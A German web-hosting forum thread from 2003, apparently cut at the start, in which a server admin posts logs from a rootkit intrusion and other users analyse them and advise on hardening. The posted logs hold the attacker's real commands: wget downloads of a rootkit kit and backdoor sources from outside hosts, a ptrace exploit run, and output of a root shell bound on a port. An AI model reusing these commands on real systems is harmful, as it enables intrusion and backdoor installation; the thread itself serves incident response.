Aber abgesehen davon hast Du natürlich recht. Um ein Rootkit zu installieren benötigt man zunächst Zugang zum System und das geht in diesem Fall (so wie ich das aus den Apache-Logs sehe) über den Indianer.

Nebenbei bemerkt sehen wir wieder ein nettes Beispiel, dass "fertige" und entsprechend umfangreiche Distris nicht unbedingt für den Einsatz auf Serversystemen geeignet sind:

Code: Select all

gcc: /tmp/.tmp/myptrace.c: Keine Berechtigung 
gcc: No input files 
gcc: /tmp/.tmp/backlyn.c: Keine Berechtigung 
gcc: No input files
@webhilfe: EIn Compiler hat auf einem Server genausowenig zu suchen wie (nicht zwingend benötigte) Interpreter. Die Quittung hast Du nun bekommen, denn ohne Compiler wäre diese Art der Attacke ins Leere gelaufen ...

Kannst Du denn die bisherigen Angriffe zuordnen? Wenn dem so ist, würde ich mich auf alle Fälle an die Polizei wenden, sei es nun Online oder bei der nöchsten Dienststelle. Das ist kein Scherz mehr, hier versucht jemand, Deine Infrastruktur zu missbrauchen oder gar zu beschädigen.

captaincrunch
Userprojekt
Userprojekt
Posts: 7225
Joined: 2002-10-09 14:30
Location: Dorsten

Re: Showtee Rootkit Hacker Angriff

Post by captaincrunch » 2003-08-05 13:20

War der ptrace nicht ein local exploit? Ich kann mich jetzt nicht mehr genau erinnern ...
Jap, ich habe zwar von remote-Exploits gehört, gesehen habe ich aber noch nie einen ... ;)
@webhilfe: EIn Compiler hat auf einem Server genausowenig zu suchen wie (nicht zwingend benötigte) Interpreter. Die Quittung hast Du nun bekommen, denn ohne Compiler wäre diese Art der Attacke ins Leere gelaufen ...
ACK
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc

alexander newald
Posts: 1117
Joined: 2002-09-27 00:54
Location: Hannover

Re: Showtee Rootkit Hacker Angriff

Post by alexander newald » 2003-08-05 14:55

Was hast du eigendlich auf deinem Rechner, dass er so interessant ist, dass sich der Angreifer die Mühe macht es mehrmals zu versuchen (Was für eine Satzkonstruktion... ;-) )?

gamecrash
Posts: 339
Joined: 2002-05-27 10:52

Re: Showtee Rootkit Hacker Angriff

Post by gamecrash » 2003-08-05 15:21

Du könntest es einfach mal mit Debian probieren... hat ja zumindest den Ruf, relativ sicher zu sein ;) Und Du hast nicht standardmäßig so viel Schrott drauf, den ein Angreifer ausnutzen kann...

Nein, das soll kein Beste-Distri-War werden...

dodolin
RSAC
Posts: 4009
Joined: 2003-01-21 01:59
Location: Sinsheim/Karlsruhe

Re: Showtee Rootkit Hacker Angriff

Post by dodolin » 2003-08-05 16:31

Was hast du eigendlich auf deinem Rechner, dass er so interessant ist, dass sich der Angreifer die Mühe macht es mehrmals zu versuchen
100 Mbit/s und genug Platz auf der Festplatte. Das reicht und macht jeden Rechner interessant - vor allem, wenn er sich so leicht hacken lässt. ;)

webhilfe
Posts: 67
Joined: 2002-05-03 14:20
Location: Hamburg

Re: Showtee Rootkit Hacker Angriff

Post by webhilfe » 2003-08-05 18:56

[quote="dea"]

@webhilfe: EIn Compiler hat auf einem Server genausowenig zu suchen wie (nicht zwingend benötigte) Interpreter. Die Quittung hast Du nun bekommen, denn ohne Compiler wäre diese Art der Attacke ins Leere gelaufen ...
[quote]

Hi,

@dea
also der compiler ist standard bei Suse 7.2. Ausserdem halte ich diesen auch für sinnvoll, zumal der Server nach dem erneuten Angriff gerade einen Tag alt war und ich das System ja irgendwie aufbauen muss.

Anzeige werde ich heute noch erstatten. Es liegt mir ja die IP des eines Users von letzter Woche vor, der Versucht hat das root pw zu knacken.

Auf dem Server sind 10 Kunden von mir drauf, allerdings musste ich einem Kunden vor 2 Wochen Kündigen. Vielleicht ist das ja seine Rache an mir?!

Der Apache Server wurde nach der Anleitung hier im Forum aufgesetzt.
Die php.ini war die standard Datei. Das einzige was ich dort geändert hatte war register_globals on.

Dies habe ich noch in den Logs des ersten Angriffs gefunden:

Code: Select all

Der Hacker hat im Hauptverzeichniss eine .bash_history hinterlassen.
id
wget http://www.zlotow.net/~shcrew/web/files/sh/shv4.tgz
tar -xzvf shv4.tgz
cd shv4
./setup fregna 88990
killall -9 backwget
killall -9 ttylynx
killall -9 ttymon
killall -9 ttywget

Apache error_log:
[Mon Aug  4 14:35:32 2003] [error] mod_ssl: SSL handshake failed: HTTP spoken on HTTPS port; trying to send HTML error page (OpenSSL library error follows)
[Mon Aug  4 14:35:32 2003] [error] OpenSSL: error:1407609C:SSL routines:func(118):reason(156) 

p100:~ # netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 0.0.0.0:993             0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:55555           0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:995             0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:873             0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:24876           0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:110             0.0.0.0:*               LISTEN      
tcp        0      0 127.0.0.1:783           0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:143             0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      
tcp        0      0 217.160.xxx.xxx:53       0.0.0.0:*               LISTEN      
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      
tcp        0      0 217.160.xxx.xxx:80       217.160.xxx.xxx:33158   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33157   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33156   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33155   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33154   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33153   TIME_WAIT   
tcp        0    128 217.160.x.x:22       62.109.119.39:1121      ESTABLISHED 
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33152   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33167   TIME_WAIT   
tcp        0      0 217.160.x.x:21       62.109.119.39:1166      ESTABLISHED 
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33165   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33164   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33163   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.90.191:47725    TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33162   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.90.191:47726    TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33161   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33160   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33175   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33174   TIME_WAIT   
tcp        0      0 217.160.x.x:110      217.227.157.82:4612     TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33173   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33172   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33171   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33170   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33168   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33151   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33150   TIME_WAIT   
tcp        0      0 217.160.x.x:110      217.227.157.82:4620     TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33149   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33147   TIME_WAIT   
tcp        0      0 217.160.x.x:22       62.109.119.39:1113      ESTABLISHED 
udp        0      0 127.0.0.1:32768         127.0.0.1:123           ESTABLISHED 
udp        0      0 0.0.0.0:514             0.0.0.0:*                           
udp        0      0 0.0.0.0:10000           0.0.0.0:*                           
udp        0      0 0.0.0.0:161             0.0.0.0:*                           
udp        0      0 217.160.x.x:53       0.0.0.0:*                           
udp        0      0 127.0.0.1:53            0.0.0.0:*                           
udp        0      0 0.0.0.0:32977           0.0.0.0:*                           
udp        0      0 217.160.x.x:123      0.0.0.0:*                           
udp        0      0 127.0.0.1:123           0.0.0.0:*                           
udp        0      0 0.0.0.0:123             0.0.0.0:*                           
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node Path
unix  2      [ ACC ]     STREAM     LISTENING     66113462 /tmp/ssh-XXmT4Dtx/agent.25279
unix  2      [ ACC ]     STREAM     LISTENING     210    /usr/local/share/sqwebmail3/var/authdaemon/socket.tmp
unix  2      [ ACC ]     STREAM     LISTENING     9033   /var/run/.nscd_socket
unix  2      [ ACC ]     STREAM     LISTENING     66098861 /tmp/ssh-XX4M55gA/agent.25069
unix  2      [ ACC ]     STREAM     LISTENING     7808   /var/lib/mysql/mysql.sock
unix  2      [ ACC ]     STREAM     LISTENING     56465184 /dev/log
unix  3      [ ]         STREAM     CONNECTED     66230049 /dev/log
unix  3      [ ]         STREAM     CONNECTED     66230048 
unix  3      [ ]         STREAM     CONNECTED     66230047 /dev/log
unix  3      [ ]         STREAM     CONNECTED     66230046 
unix  3      [ ]         STREAM     CONNECTED     66230039 /dev/log
unix  3      [ ]         STREAM     CONNECTED     66230038 
unix  3      [ ]         STREAM     CONNECTED     66230037 /dev/log
unix  3      [ ]         STREAM     CONNECTED     66230036 
unix  3      [ ]         STREAM     CONNECTED     66230032 /dev/log
unix  3      [ ]         STREAM     CONNECTED     66230031 
unix  3      [ ]         STREAM     CONNECTED     57938339 /dev/log
unix  3      [ ]         STREAM     CONNECTED     57938338 
unix  2      [ ]         DGRAM                    49870232 
unix  2      [ ]         DGRAM                    19119045 
unix  2      [ ]         DGRAM                    8422   
unix  2      [ ]         DGRAM                    8230   
unix  2      [ ]         DGRAM                    8040   
unix  2      [ ]         DGRAM                    7813   
unix  2      [ ]         DGRAM                    2802   
p100:~ # 
@Alexander Newald
Ist nichts besonderes drauf auf dem Rechner :-)

@static

Der Angreifer kam über den Indianer.

In der betreffenden Agriffzeit, Nachts um 5 Uhr.
Zu diesem Zeitpunkt war kein User auf dem System angemeldet.

Dies hab ich noch vom ersten Angriff gefunden:

Code: Select all

[Sun Aug  3 00:16:52 2003] [notice] Apache/1.3.27 (Unix) ApacheJServ/1.1.2 mod_throttle/3.0 mod_ssl/2.8.12 OpenSSL/0.9.6i mod_python/2.7.2 Python/2.0 PHP/4.3.0 mod_perl/1.25 mod_layout/1.0 mod_fastcgi/2.2.2 mod_dtcl configured -- resuming normal operations
[Sun Aug  3 00:16:52 2003] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
[Sun Aug  3 00:16:52 2003] [notice] Accept mutex: sysvsem (Default: sysvsem)
[Sun Aug  3 00:16:52 2003] [warn] long lost child came home! (pid 18130)
--05:19:37--  http://members.xoom.it/merlotx/back.c
           => `/tmp/.tmp/backwget.c'
Connecting to members.xoom.it:80... connected!
HTTP request sent, awaiting response... 302 Found
Location: http://members.xoom.virgilio.it/merlotx/back.c [following]
--05:19:38--  http://members.xoom.virgilio.it/merlotx/back.c
           => `/tmp/.tmp/backwget.c'
Connecting to members.xoom.virgilio.it:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 1,282 [text/plain]

    0K -> .                                                      [100%]

05:19:38 (1.22 MB/s) - `/tmp/.tmp/backwget.c' saved [1282/1282]

--05:19:38--  http://members.xoom.it/merlotx/back20.c
           => `/tmp/.tmp/back30.c'
Connecting to members.xoom.it:80... connected!
HTTP request sent, awaiting response... 302 Found
Location: http://members.xoom.virgilio.it/merlotx/back20.c [following]
--05:19:38--  http://members.xoom.virgilio.it/merlotx/back20.c
           => `/tmp/.tmp/back30.c'
Connecting to members.xoom.virgilio.it:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 1,335 [text/plain]

    0K -> .                                                      [100%]

05:19:38 (1.27 MB/s) - `/tmp/.tmp/back30.c' saved [1335/1335]

--05:19:38--  http://members.xoom.it/merlotx/tty
           => `/tmp/.tmp/ttywget'
Connecting to members.xoom.it:80... connected!
HTTP request sent, awaiting response... 302 Found
Location: http://members.xoom.virgilio.it/merlotx/tty [following]
--05:19:38--  http://members.xoom.virgilio.it/merlotx/tty
           => `/tmp/.tmp/ttywget'
Connecting to members.xoom.virgilio.it:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 19,472 [text/plain]

    0K -> .......... .........                                   [100%]

05:19:38 (358.79 KB/s) - `/tmp/.tmp/ttywget' saved [19472/19472]

--05:19:38--  http://packetstormsecurity.nl/0304-exploits/myptrace.c
           => `/tmp/.tmp/myptrace.c'
Connecting to packetstormsecurity.nl:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 6,296 [text/plain]

    0K -> ......                                                 [100%]

05:19:38 (341.58 KB/s) - `/tmp/.tmp/myptrace.c' saved [6296/6296]

--05:19:38--  http://members.xoom.it/merlotx/trace
           => `/tmp/.tmp/trace'
Connecting to members.xoom.it:80... connected!
HTTP request sent, awaiting response... 302 Found
Location: http://members.xoom.virgilio.it/merlotx/trace [following]
--05:19:38--  http://members.xoom.virgilio.it/merlotx/trace
           => `/tmp/.tmp/trace'
Connecting to members.xoom.virgilio.it:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 19,783 [text/plain]

    0K -> .......... .........                                   [100%]

05:19:38 (364.52 KB/s) - `/tmp/.tmp/trace' saved [19783/19783]

-> Parent's PID is 753. Child's PID is 754.
-> Attaching to 755...
-> Got the thread!!
-> Waiting for the next signal...
-> Injecting shellcode at 0x400116cd
-> Bind root shell on port 24876... =p
-> Detached from modprobe thread.
-> Committing suicide.....
[+] Attached to 759
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x400116cd
[+] Now wait for suid shell...
[+] Attached to 764
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x400116cd
[+] Now wait for suid shell...
bind: Address already in use
mkdir: cannot create directory `/tmp/.tmp': File exists
sh: /tmp/.tmp/tracelyn: Permission denied
--05:19:49--  http://members.xoom.it/merlotx/back.c
           => `/tmp/.tmp/backwget.c'
Connecting to members.xoom.it:80... connected!
HTTP request sent, awaiting response... 302 Found
Location: http://members.xoom.virgilio.it/merlotx/back.c [following]
--05:19:49--  http://members.xoom.virgilio.it/merlotx/back.c
           => `/tmp/.tmp/backwget.c'
Connecting to members.xoom.virgilio.it:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 1,282 [text/plain]

    0K -> .                                                      [100%]

05:19:49 (1.22 MB/s) - `/tmp/.tmp/backwget.c' saved [1282/1282]

--05:19:49--  http://members.xoom.it/merlotx/back20.c
           => `/tmp/.tmp/back30.c'
Connecting to members.xoom.it:80... connected!
HTTP request sent, awaiting response... 302 Found
Location: http://members.xoom.virgilio.it/merlotx/back20.c [following]
--05:19:49--  http://members.xoom.virgilio.it/merlotx/back20.c
           => `/tmp/.tmp/back30.c'
Connecting to members.xoom.virgilio.it:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 1,335 [text/plain]

    0K -> .                                                      [100%]

05:19:49 (1.27 MB/s) - `/tmp/.tmp/back30.c' saved [1335/1335]

/tmp/.tmp/ttywget: Text file busy
--05:19:50--  http://packetstormsecurity.nl/0304-exploits/myptrace.c
           => `/tmp/.tmp/myptrace.c'
Connecting to packetstormsecurity.nl:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 6,296 [text/plain]

    0K -> ......                                                 [100%]

05:19:50 (341.58 KB/s) - `/tmp/.tmp/myptrace.c' saved [6296/6296]

/tmp/.tmp/trace: Permission denied
chmod: changing permissions of `/tmp/.tmp/trace': Operation not permitted
chmod: changing permissions of `/tmp/.tmp/tracelyn': Operation not permitted
-> Parent's PID is 841. Child's PID is 842.
-> Attaching to 843...
-> Got the thread!!
-> Waiting for the next signal...
-> Injecting shellcode at 0x400116cd
-> Bind root shell on port 24876... =p
-> Detached from modprobe thread.
-> Committing suicide.....
-> We survived??!!??  : No such process
bind: Address already in use
bind: Address already in use
mkdir: cannot create directory `/tmp/.tmp': File exists
sh: /tmp/.tmp/tracelyn: Permission denied
--05:19:54--  http://members.xoom.it/merlotx/back.c
           => `/tmp/.tmp/backwget.c'
Connecting to members.xoom.it:80... connected!
HTTP request sent, awaiting response... 302 Found
Location: http://members.xoom.virgilio.it/merlotx/back.c [following]
--05:19:54--  http://members.xoom.virgilio.it/merlotx/back.c
           => `/tmp/.tmp/backwget.c'
Connecting to members.xoom.virgilio.it:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 1,282 [text/plain]

    0K -> .                                                      [100%]

05:19:54 (1.22 MB/s) - `/tmp/.tmp/backwget.c' saved [1282/1282]

--05:19:54--  http://members.xoom.it/merlotx/back20.c
           => `/tmp/.tmp/back30.c'
Connecting to members.xoom.it:80... connected!
HTTP request sent, awaiting response... 302 Found
Location: http://members.xoom.virgilio.it/merlotx/back20.c [following]
--05:19:54--  http://members.xoom.virgilio.it/merlotx/back20.c
           => `/tmp/.tmp/back30.c'
Connecting to members.xoom.virgilio.it:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 1,335 [text/plain]

    0K -> .                                                      [100%]

05:19:54 (1.27 MB/s) - `/tmp/.tmp/back30.c' saved [1335/1335]

/tmp/.tmp/ttywget: Text file busy
--05:19:54--  http://packetstormsecurity.nl/0304-exploits/myptrace.c
           => `/tmp/.tmp/myptrace.c'
Connecting to packetstormsecurity.nl:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 6,296 [text/plain]

    0K -> ......                                                 [100%]

05:19:54 (323.60 KB/s) - `/tmp/.tmp/myptrace.c' saved [6296/6296]

/tmp/.tmp/trace: Permission denied
chmod: changing permissions of `/tmp/.tmp/trace': Operation not permitted
chmod: changing permissions of `/tmp/.tmp/tracelyn': Operation not permitted
-> Parent's PID is 917. Child's PID is 918.
-> Attaching to 919...
-> Got the thread!!
-> Waiting for the next signal...
-> Injecting shellcode at 0x400116cd
-> Bind root shell on port 24876... =p
-> Detached from modprobe thread.
-> Committing suicide.....
-> We survived??!!??  : No such process
bind: Address already in use
bind: Address already in use
grep: /var/log/httpd/confixx/confixx.p100.pureserver.de_access: Permission denied
grep: /var/log/httpd/confixx/confixx.p100.pureserver.de_access: Permission denied
grep: /var/log/httpd/confixx/confixx.p100.pureserver.de_access: Permission denied
grep: /var/log/httpd/confixx/confixx.p100.pureserver.de_access: Permission denied
[Sun Aug 03 16:42:28 2003] [warn-phpa] No mempool 2 memory (pid 25778)
[Sun Aug 03 16:42:28 2003] [notice-phpa] shm cache temporarily disabled (pid 25778) 
Nach diesem Angriff der im gegensatz zum zweiten Angriff erfolgreich war, lief auf Port 55555 irgendetwas. Habe ich aber sofort mit IP Tables gespeert.

Es ist auch an den Logs zu erkennen, das sich eine Telekom User als root am System angemeldet hat. Mehrmals sogar.

Die lokalen User möchte ich mal ausschliessen, da keiner einen shell Zugang hat.

Ich gehe mal davon aus, das ein richtiger Hacker sich nicht mit meinem System beschäftigen würde. Daher glaube ich an ein Scriptkiddy, das in den nächsten Tagen ein sehr hohe Rechnung und eine Strafanzeige erhalten wird.

Danke nochmals für die Tips!!!

dea
RSAC
Posts: 619
Joined: 2002-08-13 12:05

Re: Showtee Rootkit Hacker Angriff

Post by dea » 2003-08-05 21:15

webhilfe wrote:
dea wrote:
@webhilfe: EIn Compiler hat auf einem Server genausowenig zu suchen wie (nicht zwingend benötigte) Interpreter. Die Quittung hast Du nun bekommen, denn ohne Compiler wäre diese Art der Attacke ins Leere gelaufen ...
Hi,

@dea
also der compiler ist standard bei Suse 7.2. Ausserdem halte ich diesen auch für sinnvoll, zumal der Server nach dem erneuten Angriff gerade einen Tag alt war und ich das System ja irgendwie aufbauen muss.
Wie wäre es, das System auf einem lokalen Rechner "aufzubauen" (rpm macht es einem nun wirklich leicht) um anschließend die Paketen hochzuladen und zu installieren? Das erspart Dir nicht nur Compiler und Konsorten sonder u.U. auch 'ne Menge Mehrarbeit weil Du lokal in Ruhe testen kannst. Mal ganz abgesehen von den Auswirkungen auf die Systemsicherheit ... ;)
Anzeige werde ich heute noch erstatten. Es liegt mir ja die IP des eines Users von letzter Woche vor, der Versucht hat das root pw zu knacken.
Sehr verantwortlich, aber verspich' Dir nicht allzuviel davon ...
Auf dem Server sind 10 Kunden von mir drauf, allerdings musste ich einem Kunden vor 2 Wochen Kündigen. Vielleicht ist das ja seine Rache an mir?!
Reine Spekulation, davon halte ich nicht viel ...
Der Apache Server wurde nach der Anleitung hier im Forum aufgesetzt.
Die php.ini war die standard Datei. Das einzige was ich dort geändert hatte war register_globals on.
Kenne weder die "Anleitung hier im Forum" noch den Indianer ... Allerdings ist eine solche Anleitung niemals ein Garant für ein sicheres Setup (eher im Gegenteil, wenn ich mir so manche "Anleitungen" anschaue *bibber*), sowas kannst Du nur durch eigenes fundiertes Wissen gewährleisten. Deswegen betreibe ich auch keinen Webserver auf meinem rootie ;)
Dies habe ich noch in den Logs des ersten Angriffs gefunden:

Code: Select all

Der Hacker hat im Hauptverzeichniss eine .bash_history hinterlassen.
id
wget http://www.zlotow.net/~shcrew/web/files/sh/shv4.tgz
tar -xzvf shv4.tgz
cd shv4
./setup fregna 88990
killall -9 backwget
killall -9 ttylynx
killall -9 ttymon
killall -9 ttywget
Jau, da hat er bereits Dein System geknackt gehabt und installierte das Rootkit mit PW "fregna" auf Port 88990 ... :(

Code: Select all

Apache error_log:
[Mon Aug  4 14:35:32 2003] [error] mod_ssl: SSL handshake failed: HTTP spoken on HTTPS port; trying to send HTML error page (OpenSSL library error follows)
[Mon Aug  4 14:35:32 2003] [error] OpenSSL: error:1407609C:SSL routines:func(118):reason(156) 
Welche SSL-Version hast Du denn im Einsatz? Da gab es mal vor einigen Monaten ein heftiges Aufschreien bei den Betreibern ... Würde mich nicht wundern, wenn der Angreifer darüber reinkam.

Code: Select all

p100:~ # netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 0.0.0.0:993             0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:55555           0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:995             0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:873             0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      
[b]tcp        0      0 0.0.0.0:24876           0.0.0.0:*               LISTEN      [/b]
tcp        0      0 0.0.0.0:110             0.0.0.0:*               LISTEN      
tcp        0      0 127.0.0.1:783           0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:143             0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      
tcp        0      0 217.160.xxx.xxx:53       0.0.0.0:*               LISTEN      
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      
tcp        0      0 217.160.xxx.xxx:80       217.160.xxx.xxx:33158   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33157   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33156   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33155   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33154   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33153   TIME_WAIT   
tcp        0    128 217.160.x.x:22       62.109.119.39:1121      ESTABLISHED 
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33152   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33167   TIME_WAIT   
tcp        0      0 217.160.x.x:21       62.109.119.39:1166      ESTABLISHED 
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33165   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33164   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33163   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.90.191:47725    TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33162   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.90.191:47726    TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33161   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33160   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33175   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33174   TIME_WAIT   
tcp        0      0 217.160.x.x:110      217.227.157.82:4612     TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33173   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33172   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33171   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33170   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33168   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33151   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33150   TIME_WAIT   
tcp        0      0 217.160.x.x:110      217.227.157.82:4620     TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33149   TIME_WAIT   
tcp        0      0 217.160.x.x:80       217.160.xxx.xxx:33147   TIME_WAIT   
tcp        0      0 217.160.x.x:22       62.109.119.39:1113      ESTABLISHED 
udp        0      0 127.0.0.1:32768         127.0.0.1:123           ESTABLISHED 
udp        0      0 0.0.0.0:514             0.0.0.0:*                           
udp        0      0 0.0.0.0:10000           0.0.0.0:*                           
udp        0      0 0.0.0.0:161             0.0.0.0:*                           
udp        0      0 217.160.x.x:53       0.0.0.0:*                           
udp        0      0 127.0.0.1:53            0.0.0.0:*                           
udp        0      0 0.0.0.0:32977           0.0.0.0:*                           
udp        0      0 217.160.x.x:123      0.0.0.0:*                           
udp        0      0 127.0.0.1:123           0.0.0.0:*                           
udp        0      0 0.0.0.0:123             0.0.0.0:*
Viel zu viele Ports offen/Dienste am drehen ... der fette ist das Rootkit
@Alexander Newald
Ist nichts besonderes drauf auf dem Rechner :-)
Ich rate Dir, trotzdem nochmal alles auf Notwendigkeit hin zu überprüfen.
Dies hab ich noch vom ersten Angriff gefunden:

Code: Select all

[Sun Aug  3 00:16:52 2003] [notice] Apache/1.3.27 (Unix) ApacheJServ/1.1.2 mod_throttle/3.0 mod_ssl/2.8.12 OpenSSL/0.9.6i mod_python/2.7.2 Python/2.0 PHP/4.3.0 mod_perl/1.25 mod_layout/1.0 mod_fastcgi/2.2.2 mod_dtcl configured -- resuming normal operations
[Sun Aug  3 00:16:52 2003] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
[Sun Aug  3 00:16:52 2003] [notice] Accept mutex: sysvsem (Default: sysvsem)
[Sun Aug  3 00:16:52 2003] [warn] long lost child came home! (pid 18130)
--05:19:37--  http://members.xoom.it/merlotx/back.c
           => `/tmp/.tmp/backwget.c'

[... snip ...]

05:19:38 (364.52 KB/s) - `/tmp/.tmp/trace' saved [19783/19783]

-> Parent's PID is 753. Child's PID is 754.
-> Attaching to 755...
-> Got the thread!!
-> Waiting for the next signal...
-> Injecting shellcode at 0x400116cd
-> Bind root shell on port 24876... =p
-> Detached from modprobe thread.
-> Committing suicide.....
[+] Attached to 759
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x400116cd
[+] Now wait for suid shell...
[+] Attached to 764
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x400116cd
[+] Now wait for suid shell...
bind: Address already in use
mkdir: cannot create directory `/tmp/.tmp': File exists
sh: /tmp/.tmp/tracelyn: Permission denied
--05:19:49--  http://members.xoom.it/merlotx/back.c
           => `/tmp/.tmp/backwget.c'
[... snip ... er hat's halt nochmal versucht ...]

/tmp/.tmp/trace: Permission denied
chmod: changing permissions of `/tmp/.tmp/trace': Operation not permitted
chmod: changing permissions of `/tmp/.tmp/tracelyn': Operation not permitted
-> Parent's PID is 841. Child's PID is 842.
-> Attaching to 843...
-> Got the thread!!
-> Waiting for the next signal...
-> Injecting shellcode at 0x400116cd
-> Bind root shell on port 24876... =p
-> Detached from modprobe thread.
-> Committing suicide.....
-> We survived??!!??  : No such process
bind: Address already in use
bind: Address already in use

[... snip ... und noch mal ...]

/tmp/.tmp/trace: Permission denied
chmod: changing permissions of `/tmp/.tmp/trace': Operation not permitted
chmod: changing permissions of `/tmp/.tmp/tracelyn': Operation not permitted
-> Parent's PID is 917. Child's PID is 918.
-> Attaching to 919...
-> Got the thread!!
-> Waiting for the next signal...
-> Injecting shellcode at 0x400116cd
-> Bind root shell on port 24876... =p
